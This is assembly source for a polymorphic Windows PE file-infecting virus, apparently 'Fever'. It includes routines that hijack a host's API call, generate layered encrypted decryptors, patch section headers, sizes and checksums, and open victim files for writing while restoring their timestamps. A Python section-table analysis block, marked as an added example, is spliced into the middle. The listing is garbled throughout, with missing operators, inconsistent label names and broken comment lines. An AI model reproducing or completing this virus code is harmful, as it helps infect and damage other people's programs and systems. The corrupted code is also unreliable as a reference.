
Push ECX

Lea EDI, DWORD PTR [EBP PSHPSTEPINDEX]

Gentblstdloop: MOV EAX, 00000004H

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBLSTDPSHP EAX * 04H]

Lodsd

CMP EAX, 0FFFFFFFH

JZ geentblstdloop

Stosd

MOV DWORD PTR [ESI-00000004H], 0FFFFFFFH

Loop gentsblstdloop

POP ECX

Lea ESI, DWORD PTR [EBP PSHPSTEPINDEX]

POP EDI

Push EDI

Add Edi, TBLDOPOLYPOPS-VIRO_SYS

DOPOLYPOPSLOOP: LODSD

Lea EDX, DWORD PTR [EBP EAX TBLDOPOP]

Mov Al, Byte Ptr [EDX]

Stosb

Loop dopolypopsloop

; ================================================== ===========

Prepare First Decryptor Mark

; ================================================== ===========

MOV BYTE PTR [EBP ISFIRST], CL

; ================================================== ===========; Initialize Size Of All Decryptors

; ================================================== ===========

MOV DWORD PTR [EBP DECRYPTOR_SIZE], ECX

; ================================================== ===========

; Get CRC32 of Main Virus Body and Save IT for L8R USE

; ================================================== ===========

POP ESI

PUSH ESI

Add ESI, CRC_PROTECTED-VIRO_SYS

Mov ECX, SizeoftProtect

Call get_crc32

POP EDI

MOV DWORD PTR [EDI ViRalChecksum-Viro_sys], EDX

; ================================================== ===========; Generate Polymorphic Encryption

; ================================================== ===========

Add Edi, INF_SIZE

MOV EDX, DWORD PTR [EBP VIR_OFFSET]

Mov Eax, Number_Of_Poly_Layers

Call get_rnd_range

INC EAX

INC EAX

MOV ECX, EAX

Each_Layer: Push ECX

CMP ECX, 00000001H

JNE set1stflag

MOV DWORD PTR [EBP ISFIRST], 0FFH

Set1stflag: MOV ECX, DWORD PTR [EBP DECRYPTOR_SIZE]

Add ECX, INF_SIZE

MOV ESI, DWORD PTR [EBP VIR_OFFSET]

Call Mutate

Add DWORD PTR [EBP DECRYPTOR_SIZE], ECX

POP ECX

LOOP Each_Layer

; ================================================== ===========

; Insert a call to Virus Code over the API CALL

; ================================================== ===========

MOV EDI, DWORD PTR [EBP INJECT_OFFS] Add Edi, EBX

Mov al, 0e8h

Stosb

Push EDI

; ================================================== ===========

Calculate The Call Displacement

; ================================================== ===========

Call get_code_sh

MOV EAX, DWORD PTR [ESI OH_FILALIGNMENT]

MOV DWORD PTR [EBP RAW_ALIGN], EAX

MOV EAX, DWORD PTR [EBP INJECT_OFFS]

Sub Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [EDI SH_VIRTUALADDRESS]

Push EAX

MOV EAX, DWORD PTR [EBP Entry_Point]

Sub eax, 00000005H

Sub Eax, EBX

MOV EDI, DWORD PTR [EBP VIRUS_SH]

Sub Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [EDI SH_VIRTUALADDRESS]

POP EDX

Sub Eax, EDX

POP EDI

Stosd

MOV EDI, DWORD PTR [EBP VIRUS_SH]

; ================================================== ===========

; Set Read / Write Access on Virus Section

; ================================================== =========== OR DWORD PTR [EDI Sh_Characteristics], /

Image_scn_mem_read or image_scn_mem_write

; ================================================== ===========

DONT Share Virus Section

; ================================================== ===========

And DWORD PTR [EDI SH_CHARACTERISTICS], /

Not image_scn_mem_shared

; ================================================== ===========

Update SizeOfrawData

; ================================================== ===========

MOV EAX, DWORD PTR [EBP VIR_OFFSET] Add Eax, DWORD PTR [EBP DECRYPTOR_SIZE]

Add Eax, Inf_Size

MOV EDX, DWORD PTR [EDI Sh_POINTERTORAWDATA]

MOV DWORD PTR [EBP FIX_SIZE], EDX

Sub Eax, EDX

CMP EAX, DWORD PTR [EDI Sh_SIZEOFRAWDATA]

Jbe rawsizeok

; ================================================== ===========

; If we change SizeofrawData Round Up to nearest

File Alignment

; ================================================== ===========

XOR EDX, EDX

MOV ECX, DWORD PTR [EBP RAW_ALIGN]

Div ECX

INC EAX

Mul ECX

MOV EDX, DWORD PTR [EDI Sh_SIZEOFRAWDATA]

Mov DWORD PTR [EDI SH_SIZEOFRAWDATA], EAX

Sub Eax, EDX

Test DWORD PTR [EDI SH_CHARACTERISTICS], /

Image_scn_cnt_initialized_data

JZ Rawsizeok

Add DWORD PTR [ESI OH_SIZEOFINIALIZEDDATA], EAX

; ================================================== ===========

Update Virtualsize

; ================================================== =========== Rawsizeok: MOV Eax, DWORD PTR [EDI Sh_SIZEOFRAWDATA]

Add DWORD PTR [EBP FIX_SIZE], EAX

Add eax, size_virtual-inf_size

CMP EAX, DWORD PTR [EDI SH_VIRTUALSIZE]

Jbe Virtualsizeok

MOV DWORD PTR [EDI SH_VIRTUALSIZE], EAX

; ================================================== ===========

Update SizeOfImage

; ================================================== ===========

Virtualsizeok: MOV Eax, DWORD PTR [EDI Sh_VIRTUALADDRESS]

Add Eax, DWORD PTR [EDI SH_VIRTUALSIZE]

XOR EDX, EDX

MOV ECX, DWORD PTR [ESI OH_SECTIONALNMENT]

Div ECX

INC EAX

Mul ECX

MOV DWORD PTR [ESI OH_SIZEOFIMAGE], EAX

; ================================================== ===========

FIND ANY DATA DIRECTORY Entry Pointing to Last Section; ======================================= =====================

MOV ECX, image_numberof_directory_entries

Lea EDX, DWORD PTR [ESI OH_DATADIRECTORY]

FDATAPTR2LAST: MOV EAX, DWORD PTR [EDX]

CMP EAX, DWORD PTR [EDI Sh_VIRTUALADDRESS]

JNE NextFDataPtr

MOV EAX, DWORD PTR [EDI SH_VIRTUALSIZE]

Mov DWORD PTR [EDX 00000004H], EAX

JMP Short DonefdataPtr

NextfdataPtr: add edx, 00000008H

Loop fdataptr2last

; ================================================== ===========

Clear Base Relocation Field

; ================================================== ===========

DONEFDATAPTR: XOR EAX, EAX

Lea EDI, DWORD PTR [ESI /

OH_DATADIRECTORY /

DE_BASERELOC /

DD_VIRTUALADDRESS]

CLD

Stosd

Stosd

; ================================================== ===========

; Compute new file checksum and update it on PE header

; ================================================== ===========

MOV EAX, DWORD PTR [EBP FIX_SIZE]

MOV ECX, SIZE_PADDING

XOR EDX, EDX

Div ECX

INC EAX

Mul ECX

Push EAX

CMP DWORD PTR [EBP HIMGHLP], 00000000H

JZ Nochecksum

MOV BYTE PTR [EBX EAX], 00H

Mov Edx, EAX

Lea ESI, DWORD PTR [EBP CHECKSUMPE]

Push ESI; Checksum

Lodsd

Push ESI; Headersum

Push EDX; FileLength

Push EBX

Call DWORD PTR [EBP A_CHECKSUMMAPPEDFILE]

OR EAX, EAX

JZ Nochecksum

CMP DWORD PTR [ESI], 00000000H

JZ Nochecksum

MOV EDX, DWORD PTR [ESI-00000004h]

Mov DWORD PTR [EAX /

NT_OPTIONALHEADER.OH_CHECKSUM], EDX

; ================================================== ===========

; Mark file as infected and optimize file size

; ================================================== ===========

Nochecksum: POP EAX

Mov DWORD PTR [EBP FATSIZE], EAX

Call fileunmaprw

RET

; ================================================== ===========

; Close file mapping

; ================================================== ===========

INF_CLOSE_FILE: CALL Fileunmapro

INF_FILE_ERR: RET

; ================================================== ===========================

; Scan host code

;

; On Entry:

;  EBX -> memory image base address

; Exit:

;  ECX -> inject point offset in file

;         or NULL if error

; ================================================== ===========================

Call Rva2Raw

MOV DWORD PTR [EBP Importsh], EDI

Call get_code_sh

JECXZ EXITAPE

MOV EAX, DWORD PTR [ESI OH_IMAGEBASE]

MOV DWORD PTR [EBP HOST_BASE], EAX

Sub EDX, DWORD PTR [EDI SH_VIRTUALADDRESS]

MOV ECX, DWORD PTR [EDI Sh_SIZEOFRAWDATA]

SUB ECX, EDX

Add Edx, DWORD PTR [EDI SH_POINTERTORAWDATA]; Entry-Point Raw

Lea ESI, DWORD PTR [EBX EDX]

Search_call: Push ECX

XOR EAX, EAX

Lodsb

CMP Al, 0E8H; API CALL GENERATED BY BORLAND Linker?

JE TRY_BORLAND

CMP AL, 0FFH; API CALL GENERATED BY Microsoft Linker?

JE TRY_MICROSOFT

ERR_API_CALL: POP ECX

Loop search_call

EXITAPE: RET

Try_borland: MOV Eax, ESI

Add Eax, DWORD PTR [ESI]; Go to Refered Address

Sub Eax, EBX; Convert to RVA

MOV EDX, DWORD PTR [EDI Sh_VIRTUALADDRESS]

CMP EAX, EDX

JB ERR_API_CALL; BELOW CODE?

Add Edx, DWORD PTR [EDI SH_VIRTUALSIZE]

CMP EAX, EDX

JAE ERR_API_CALL; Above Code?

CMP Word PTR [EAX EBX-00000002H], 25ffH; JMP DWORD PTR [xxxx]

JNE ERR_API_CALL

Push DWORD PTR [EAX EBX]

POP EAX

SUB EAX, DWORD PTR [EBP HOST_BASE]; Get A RVA Again

MOV EDX, DWORD PTR [EBP Importsh]

MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]

CMP EAX, ECX

JB ERR_API_CALL; BELOW IMPORTS?

Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]

CMP EAX, ECX

JAE ERR_API_CALL; Above Imports?

Sub Eax, DWORD PTR [EDX SH_VIRTUALADDRESS]

Add Eax, DWORD PTR [EDX SH_POINTERTORAWDATA]

Push DWORD PTR [EAX EBX]

POP EAX

MOV EDX, DWORD PTR [EBP Importsh]

MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]

CMP EAX, ECX

JB ERR_API_CALL; BELOW IMPORTS?

Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]

CMP EAX, ECX

JAE ERR_API_CALL; Above Imports?

Found_Place:; use this point? or better Continue the Search?

Call get_rnd_range

Test Eax, 01H

JZ ERR_API_CALL

POP EAX

MOV ECX, ESI

Dec ECX

SUB ECX, EBX

RET

TRY_MICROSOFT: CMP BYTE PTR [ESI], 15h

JNE ERR_API_CALL

Mov Eax, DWORD PTR [ESI 00000001H]

SUB EAX, DWORD PTR [EBP HOST_BASE]

MOV EDX, DWORD PTR [EBP Importsh]

MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]

CMP EAX, ECX

JB ERR_API_CALL; BELOW IMPORTS?

Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]

CMP EAX, ECX

JAE ERR_API_CALL; Above Imports?

SUB EAX, DWORD PTR [EDX SH_VIRTUALADDRESS]

Add Eax, DWORD PTR [EDX Sh_POINTERTORAWDATA]

Push DWORD PTR [EAX EBX]

POP EAX

; If file is bound, EAX contains the address of the API;

; let's check if EAX points to a KERNEL32 API

CMP EAX, DWORD PTR [EBP K32CODESTART]

JB INSIDE_IMPORT

CMP EAX, DWORD PTR [EBP K32CODEEND]

JB Found_Place

INSIDE_IMPORT: MOV EDX, DWORD PTR [EBP IMPORTSH]

MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]

CMP EAX, ECX

JB ERR_API_CALL; BELOW IMPORTS?

Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]

CMP EAX, ECX

JAE ERR_API_CALL; Above Imports?

JMP Found_Place

; ================================================== ===========================

; SEH handling routines code by Jacky Qwerty / 29A

; ================================================== ===========================

SEH_FRAME: SUB EDX, EDX

Push DWORD PTR FS: [EDX]

MOV FS: [EDX], ESP

JMP [ESP. (02H * pshd) .retaddr]

SEH_REMOVEFRAME: Push 00000000H

POP EDX

Pop DWORD PTR [ESP. (02H * pshd) .retaddr]

POP DWORD PTR FS: [EDX]

POP EDX

RET (PSHD)

SEH_SETUPFRAME: CALL SEH_FRAME

Mov Eax, [ESP.EH_EXCEPTIONRECORD]

TEST BYTE PTR [EAX.ER_EXCEPTIONFLAGS], /

EH_UNWINDING OR EH_EXIT_UNWIND

MOV EAX, DWORD PTR [EAX.ER_EXCEPTIONCODE]

Jnz SEH_SEARCH

Add eax, -exception_access_violation

Jnz SEH_SEARCH

MOV ESP, DWORD PTR [ESP.EH_ESTABLISHERFRAME]

MOV DWORD PTR FS: [EAX], ESP

JMP DWORD PTR [ESP. (02H * pshd) .arg1]

SEH_SEARCH: XOR EAX, EAX

RET

; ================================================== ===========================

; Filemapro: open and map a file for read-only access

;

; On Entry:

;  BUFSTRFILENAME -> buffer filled with path filename

; Exit:

;  EAX -> base address of memory map for file or NULL if error

; ================================================== ===========================

; ================================================== ===========

; GetFileAttributes

; ================================================== ===========

Filemapro: LEA ESI, DWORD PTR [EBP BUFSTRFILENAME]

Push ESI; LPFILENAME

Call DWORD PTR [EBP A_GETFILEATTRIBUTESA]

CMP EAX, 0FFFFFFFH

JNE FileGetAttrOk

FileGetAttrErr: xor Eax, EAX

RET

; ================================================== ===========

; CreateFile (GENERIC_READ)

; ================================================== ===========

FileGetAttrOk: MOV DWORD PTR [EBP CURFILEATTR], EAX

XOR EDI, EDI

Push EDI; HTEMPLATEFILE

Push file_attribute_normal; dwflagsandattributes

Push Open_EXISTING; DWCREATIONDisPosition

Push EDI; LPSecurityAttributes

Push EDI; DWSHAREMODE

Push generic_read; dwdesiredAccess

Push ESI; LPFILENAME

Call DWORD PTR [EBP A_CREATEFILEA]

CMP EAX, INVALID_HANDLE_VALUE

JE FileGetAttrErr

; ================================================== ===========

; CreateFileMapping (PAGE_READONLY)

; ================================================== ===========

MOV DWORD PTR [EBP H_CREATEFILE], EAX

Push EDI; LPNAME

Push EDI; DWMAXIMUMSIZELOW

Push EDI; DWMAXIMUMSIZEHIGH

Push Page_readonly; flprotect

Push EDI; LPFILEMAPPINGATTRIBUTES

Push DWORD PTR [EBP H_CREATEFILE]; HFILE

Call DWORD PTR [EBP A_CREATEFILEMAPPINGA]

OR EAX, EAX

Jnz Okfilemappingro

Errfilemapro: Push DWORD PTR [EBP H_CREATEFILE]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP FileGetAttrErr

; ================================================== ===========

; MapViewOfFile

; ================================================== ===========

Okfilemappingro: MOV DWORD PTR [EBP H_FILEMAP], EAX

Push EDI; DWNUMBEROFBYTOMAP

Push EDI; DWFILEOFFSETLOW

Push EDI; DWFILEOFFSETHIGH

Push file_map_read; dwdesiredAccess

Push Eax; HfileMappingObject

Call DWORD PTR [EBP A_MAPVIEWOFFILE]

OR EAX, EAX

Jnz FileViewokro

FileViewError: Push DWORD PTR [EBP H_FILEMAP]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP Errfilemapro

; ================================================== ===========

; Ready!

; ================================================== ===========

FileViewokro: MOV DWORD PTR [EBP MAP_IS_HERE], EAX

RET

; ================================================== ===========

; Unmapro

; ================================================== ===========

Fileunmapro: Push EBX

Call DWORD PTR [EBP A_UNMAPVIEWOFFILE]

JMP FileViewErrorro

; ================================================== ===========================

; Filemaprw: open and map a file for read and write access

;

; On Entry:

;  BUFSTRFILENAME -> buffer filled with path filename

; Exit:

;  EAX -> base address of memory map for file or NULL if error

; ================================================== ===========================

; ================================================== ===========

; Calculate size of infected file

; ================================================== ===========

Filemaprw: MOV Eax, DWORD PTR [EBP VIR_OFFSET]

Add Eax, (SIZE_VIRTUAL * 02H) /

(Number_of_Poly_Layers * 00004000H)

MOV ECX, SIZE_PADDING

XOR EDX, EDX

Div ECX

INC EAX

Mul ECX

Mov DWORD PTR [EBP FATSIZE], EAX

; ================================================== ===========

; SetFileAttributes

; ================================================== ===========

LEA ESI, DWORD PTR [EBP BUFSTRFILENAME]

Push file_attribute_normal; dwfileAttributes

Push ESI; LPFILENAME

Call DWORD PTR [EBP A_SETFILEATTRIBUTESA]

OR EAX, EAX

JNZ FileSetattrok

FileSetattrer: xor Eax, EAX

RET

; ================================================== ===========

; CreateFile (GENERIC_READ or GENERIC_WRITE)

; ================================================== ===========

FileSetattrok: xor Edi, EDI

MOV DWORD PTR [EBP MAP_IS_HERE], EDI

Push EDI; HTEMPLATEFILE

Push file_attribute_normal; dwflagsandattributes

Push Open_EXISTING; DWCREATIONDisPosition

Push EDI; LPSecurityAttributes

Push EDI; DWSHAREMODE

Push generic_read or generic_write; dwdesiredAccess

Push ESI; LPFILENAME

Call DWORD PTR [EBP A_CREATEFILEA]

CMP EAX, INVALID_HANDLE_VALUE

JNE FileOpenokrw

FileopenerrorRrw: Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]; Need for Reverse!

Push DWORD PTR [EBP CURFileAttr]; DWFileAttributes

Push ESI; LPFILENAME

Call DWORD PTR [EBP A_SETFILEATTRIBUTESA]

JMP FileSetattrerr

; ================================================== ===========

; CreateFileMapping (PAGE_READWRITE)

; ================================================== ===========

FileOpenokrw: MOV DWORD PTR [EBP H_CREATEFILE], EAX

Push EDI; LPNAME

Push DWORD PTR [EBP FATSIZE]; DWMAXIMUMSIZELOW

Push EDI; DWMAXIMUMSIZEHIGH

Push Page_Readwrite; flprotect

Push EDI; LPFILEMAPPINGATTRIBUTES

Push eax; hfile

Call DWORD PTR [EBP A_CREATEFILEMAPPINGA]

OR EAX, EAX

JNZ Filemapokrw

FilemaperrorRrw: CMP DWORD PTR [EBP MAP_IS_HERE], EDI

JZ FileSizeisok

MOV ESI, DWORD PTR [EBP H_CREATEFILE]

XOR EAX, EAX

Push Eax; DWMoveMethod

Push Eax; LPDistanceTomovehigh

Push DWORD PTR [EBP FATSIZE]; LDISTANCETOMOVE

Push ESI; HFILE

Call DWORD PTR [EBP A_SETFILEPOINTER]

CMP EAX, 0FFFFFFFH

Je FileSizeisok

Push ESI; HFILE

Call DWORD PTR [EBP A_SETENDOFFILE]

Lea Edx, DWORD PTR [EBP FT_LASTWRITIME]

Push Edx

Sub EDX, 00000008H

Push Edx

Sub EDX, 00000008H

Push Edx

PUSH ESI

Call DWORD PTR [EBP A_SETFILETIME]

FileSizeisok: Push DWORD PTR [EBP H_CREATEFILE]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP FileOpenerrorRrw

; ================================================== ===========

; MapViewOfFile

; ================================================== ===========

Filemapokrw: MOV DWORD PTR [EBP H_FILEMAP], EAX

Push DWORD PTR [EBP FATSIZE]; DWNUMBEROFBYTOMAP

Push EDI; DWFILEOFFSETLOW

Push EDI; DWFILEOFFSETHIGH

Push file_map_write; dwdesiredAccess

Push Eax; HfileMappingObject

Call DWORD PTR [EBP A_MAPVIEWOFFILE]

OR EAX, EAX

JNZ FileViewokrw

FileViewErrorRrw: Push DWORD PTR [EBP H_FILEMAP]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP FilemaPerrorRW

FileViewokrw: MOV DWORD PTR [EBP MAP_IS_HERE], EAX

RET

; ================================================== ===========

; Unmaprw

; ================================================== ===========

Fileunmaprw: Push EBX

Call DWORD PTR [EBP A_UNMAPVIEWOFFILE]

JMP FileViewErrorrw

; ================================================== ===========================

; Convert RVA to raw

;

; On Entry:

;  EBX -> host base address

;  EDX -> RVA to convert

; On Exit:

;  ECX -> pointer to raw data or NULL if error

;  EDX -> section delta offset

;  ESI -> pointer to IMAGE_OPTIONAL_HEADER

;  EDI -> pointer to section header

; ================================================== ===========================

RVA2RAW: CLD

MOV DWORD PTR [EBP Search_RAW], EDX

MOV ESI, DWORD PTR [EBX MZ_LFANEW]

Add ESI, EBX

Lodsd

Movzx ECX, Word PTR [ESI FH_NUMBEROFSECTIONS]

JECXZ ERR_RVA2RAW

Movzx EDI, Word PTR [ESI FH_SIZEOFOPTIONALHEADER]

Add ESI, Image_SizeOf_file_header

Add Edi, ESI

; ================================================== ===========

; Get the IMAGE_SECTION_HEADER that contains RVA

;

; At this point:

;  EBX -> file base address

;  ESI -> pointer to IMAGE_OPTIONAL_HEADER

;  EDI -> pointer to first section header

;  ECX -> number of sections

;

; Check if address of imports directory is inside this

; section

; ================================================== ===========

S_IMG_SECTION: MOV EAX, DWORD PTR [EBP Search_RAW]

MOV EDX, DWORD PTR [EDI Sh_VIRTUALADDRESS]

Sub Eax, EDX

CMP EAX, DWORD PTR [EDI SH_VIRTUALSIZE]

JB Section_ok

; ================================================== ===========

; Go to next section header

; ================================================== ===========

OUT_OF_SECTION: Add Edi, Image_SizeOf_SECTION_HEADER

Loop S_IMG_SECTION

ERR_RVA2RAW: RET

; ================================================== ===========

; Get raw

; ================================================== ===========

Section_ok: MOV ECX, DWORD PTR [EDI SH_POINTERTORAWDATA]

Sub EDX, ECX

Add ECX, EAX

Add ECX, EBX

RET
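Added example, not code from the Fever listing or its author: a Python rendering of the RVA2RAW lookup above and of the DIV / INC / MUL rounding that the header fix-up routine applies to SizeOfRawData and SizeOfImage, written for analysing a suspect file rather than modifying one. The section table, the dataclass and the function names are constructed for the example.

```python
"""PE section-table helpers mirroring two routines in the listing:
RVA2RAW (section lookup by VirtualAddress/VirtualSize) and the
(value / align + 1) * align rounding used when the headers are patched.
Constructed example; not taken from the original source."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class SectionHeader:
    """Subset of IMAGE_SECTION_HEADER fields the listing reads."""
    name: str
    virtual_size: int
    virtual_address: int
    size_of_raw_data: int
    pointer_to_raw_data: int


def next_boundary(value: int, alignment: int) -> int:
    """XOR EDX,EDX / DIV ECX / INC EAX / MUL ECX as in the listing:
    (value // alignment + 1) * alignment. An already aligned value is
    pushed to the *next* boundary rather than kept."""
    if alignment <= 0:
        raise ValueError("alignment must be positive")
    return (value // alignment + 1) * alignment


def align_up(value: int, alignment: int) -> int:
    """Conventional linker round-up: an aligned value is unchanged."""
    if alignment <= 0:
        raise ValueError("alignment must be positive")
    return -(-value // alignment) * alignment


def rva_to_raw(sections: List[SectionHeader], rva: int) -> Optional[int]:
    """RVA2RAW: return the file offset of rva, or None if no section's
    [VirtualAddress, VirtualAddress + VirtualSize) range contains it.
    The listing does SUB then an unsigned CMP/JB, so an rva below the
    section start wraps to a huge value and fails; 0 <= delta is the
    same test in Python."""
    for sh in sections:
        delta = rva - sh.virtual_address
        if 0 <= delta < sh.virtual_size:
            return sh.pointer_to_raw_data + delta
    return None


def expected_size_of_image(sections: List[SectionHeader], section_alignment: int) -> int:
    """SizeOfImage a loader expects: end of the last section, aligned up."""
    last = sections[-1]
    return align_up(last.virtual_address + last.virtual_size, section_alignment)


def fever_size_of_image(sections: List[SectionHeader], section_alignment: int) -> int:
    """What the listing's DIV/INC/MUL sequence writes: one alignment unit
    larger than expected whenever the last section ends on a boundary."""
    last = sections[-1]
    return next_boundary(last.virtual_address + last.virtual_size, section_alignment)


# Constructed sample section table (not from any real binary).
SECTION_ALIGNMENT = 0x1000
FILE_ALIGNMENT = 0x200
SAMPLE_SECTIONS = [
    SectionHeader(".text", 0x0F00, 0x1000, 0x1000, 0x0400),
    SectionHeader(".data", 0x0800, 0x2000, 0x0800, 0x1400),
    SectionHeader(".rsrc", 0x1000, 0x3000, 0x1000, 0x1C00),
]

if __name__ == "__main__":
    for rva in (0x1010, 0x2100, 0x1F80, 0x4000):
        print(hex(rva), "->", rva_to_raw(SAMPLE_SECTIONS, rva))
    print("expected SizeOfImage:", hex(expected_size_of_image(SAMPLE_SECTIONS, SECTION_ALIGNMENT)))
    print("listing's SizeOfImage:", hex(fever_size_of_image(SAMPLE_SECTIONS, SECTION_ALIGNMENT)))
```

Note that 0x1F80 maps to nothing although it lies inside .text's raw data: the lookup uses VirtualSize, exactly as the routine above does.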

; ================================================== ===========================

; Get code section header and entry-point information

;

; On Entry:

;  EBX -> host base address

; On Exit:

;  ECX -> pointer to raw data or NULL if error

;  EDX -> entry-point RVA

;  ESI -> pointer to IMAGE_OPTIONAL_HEADER

;  EDI -> pointer to section header

; ================================================== ===========================

GET_CODE_SH: CALL GET_LAST_SH

MOV EDX, DWORD PTR [ESI OH_ADDRESSOFENTRYPOINT]

Push Edx

Call Rva2Raw

POP EDX

RET

; ================================================== ===========================

; Get pointer to last section header

;

; On Entry:

;  EBX -> host base address

; On Exit:

;  ESI -> IMAGE_OPTIONAL_HEADER

;  EDI -> pointer to last section header

; ================================================== ===========================

GET_LAST_SH: PUSH ECX

MOV ESI, DWORD PTR [EBX MZ_LFANEW]

Add ESI, EBX

CLD

Lodsd

Movzx ECX, Word PTR [ESI FH_NUMBEROFSECTIONS]

Dec ECX

MOV EAX, Image_SizeOf_section_Header

Mul ECX

Movzx EDX, Word Ptr [ESI FH_SIZEOFOPTIONALHEADER]

Add ESI, Image_SizeOf_file_header

Add Eax, EDX

Add Eax, ESI

Mov Edi, EAX

POP ECX

RET

; ================================================== ===========================

; Generate data area suitable for memory write access

;

;  EDI -> base address

;  ECX -> size

; ================================================== ===========================

Gen_data_area: Push Eax

Push Edx

Movzx Eax, Byte PTR [EBP NumberofDataareas]

CMP EAX, NUM_DA

JAE NO_MORE_DA

Lea EDX, DWORD PTR [EBP TBL_DATA_AREA EAX * 08H]

Mov Eax, EDI

SUB EAX, DWORD PTR [EBP MAP_IS_HERE]

Add Eax, DWORD PTR [EBP HOST_BASE]

Push ECX

MOV ECX, DWORD PTR [EBP VIRUS_SH]

Sub Eax, DWORD PTR [ECX SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [ECX SH_VIRTUALADDRESS]

Mov DWORD PTR [EDX], EAX

POP ECX

MOV DWORD PTR [EDX 00000004h], ECX

Inc Byte PTR [EBP NumberofDataareas]

NO_MORE_DA: POP EDX

POP EAX

RET

; ================================================== ===========================

; Generate a block of random data

; ================================================== ===========================

GEN_RND_BLOCK: MOV EAX, 0000000AH

MOV ECX, EAX

Call get_rnd_range

Add ECX, EAX

Call Gen_Data_Area

RND_FILL: MOV EAX, DWORD PTR [EBP FileSizeOnDisk]

Dec EAX

Sub Eax, ECX

Call get_rnd_range

Add Eax, DWORD PTR [EBP MAP_IS_HERE]

Mov ESI, EAX

CLD

REP MOVSB

RET

; ================================================== ===========================

; Linear congruential pseudorandom number generator

; ================================================== ===========================

GET_RND32: PUSH ECX

Push Edx

MOV EAX, DWORD PTR [EBP RND32_SEED]

MOV ECX, 41C64E6DH

Mul ECX

Add eax, 00003039H

And Eax, 7FFFFFFH

MOV DWORD PTR [EBP RND32_SEED], EAX

POP EDX

POP ECX

RET

; ================================================== ===========================

; Returns a random number between 0 and entry EAX

; ================================================== ===========================

GET_RND_RANGE: PUSH ECX

Push Edx

MOV ECX, EAX

Call get_rnd32

XOR EDX, EDX

Div ECX

MOV EAX, EDX

POP EDX

POP ECX

RET

; ================================================== ===========================

; Perform Encryption

; ================================================== ===========================

; ================================================== ============

; This buffer will contain the code to "crypt" the virus code

; followed by a return instruction

; ================================================== ===========

Perform_crypt: DB 10h DUP (90h)

; ================================================== ===========================

; Generate decryptor action: loading pointer

;

; We don't need to get delta-offset, this virus assumes fixed load address

; ================================================== ===========================

Gen_load_ptr: MOV Al, 0B8H

OR Al, Byte PTR [EBP INDEX_MASK]

Stosb

MOV EAX, DWORD PTR [EBP HOST_BASE]

Add Eax, DWORD PTR [EBP PTRTOCRYPT]

Add Eax, DWORD PTR [EBP PTR_DISP]

MOV EDX, DWORD PTR [EBP VIRUS_SH]

Sub Eax, DWORD PTR [EDX SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [EDX SH_VIRTUALADDRESS]

TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_DIRECTION

JZ FIX_DIR_OK

Push Eax; FIX UPON DIRECTION

Call fixed_size2ecx

XOR EAX, EAX

MOV Al, Byte PTR [EBP OPER_SIZE]

Push EAX

Mul ECX

POP ECX

Sub Eax, ECX

POP ECX

Add Eax, ECX

FIX_DIR_OK: StOSD

RET

; ================================================== ===========================

; Generate Decryptor Action: loading counter

; ================================================== ===========================

; ================================================== ===========

; Easy now, just move counter random initial value

; into counter reg and calculate the end value

; ================================================== ===========

GEN_LOAD_CTR: MOV Al, 0B8H

OR Al, Byte PTR [EBP Counter_mask]

Stosb

Call fixed_size2ecx

Call get_rnd32

Stosd

TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_CDIR

JNZ Counter_Down

Counter_up: Add Eax, ECX

JMP Short Done_ctr_dir

Counter_Down: Sub Eax, ECX

DONE_CTR_DIR: MOV DWORD PTR [EBP END_VALUE], EAX

RET

; ================================================== ===========================

; Generate Decryptor Action: Decrypt

; ================================================== ===========================

Gen_Decrypt: MOV Eax, DWORD PTR [EBP PTR_DISP]

MOV DWORD PTR [EBP FAKE_PTR_DISP], EAX

MOV EAX, DWORD PTR [EBP CRYPT_KEY]

MOV DWORD PTR [EBP FAKE_CRYPT_KEY], EAX

MOV Al, Byte PTR [EBP Build_Flags]

MOV BYTE PTR [EBP FAKE_BUILD_FLAGS], Al

MOV Al, Byte PTR [EBP OPER_SIZE]

MOV BYTE PTR [EBP FAKE_OPER_SIZE], Al

MOV Al, Byte PTR [EBP INDEX_MASK]

MOV BYTE PTR [EBP FAKE_INDEX_MASK], Al

Call fake_or_not

XOR EAX, EAX

MOV Al, Byte PTR [EBP OPER_SIZE]

SHR EAX, 01H

SHL EAX, 02H

Add ESI, ESI

Lodsd

Add Eax, EBP

Mov ESI, EAX

Push EDI

Lea EDI, DWORD PTR [EBP Perform_Crypt]

LOOP_STRING: LODSB

CMP Al, Magic_ENDSTR

JE END_OF_MAGIC

CMP Al, Magic_ENDKEY

JE Last_SPell

XOR ECX, ECX

MOV CL, Al

REP MOVSB

JMP Short loop_string

Last_spell: Call Copy_Key

END_OF_MAGIC: MOV Al, 0C3H

Stosb

POP EDI

RET

; ================================================== ===========================

; Copy encryption key into work buffer, taking care about operand size

; ================================================== ===========================

Copy_Key: MOV Eax, DWORD PTR [EBP FAKE_CRYPT_KEY]

Movzx ECX, Byte Ptr [EBP FAKE_OPER_SIZE]

LOOP_KEY: Stosb

SHR EAX, 08H

Loop loop_key

RET

; ================================================== ===========================

; Generate decryptor action: move index to next step

; ================================================== ===========================

; ================================================== ===========

; Get number of bytes to inc or dec the index reg

; ================================================== ===========

GEN_NEXT_STEP: MOVZX ECX, Byte Ptr [EBP OPER_SIZE]

; ================================================== ===========

; Get number of bytes to update with this instruction

; ================================================== ===========

LOOP_UPDATE: MOV EAX, ECX

Call get_rnd_range

INC EAX

; ================================================== ===========

; Check direction

; ================================================== ===========

TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_DIRECTION

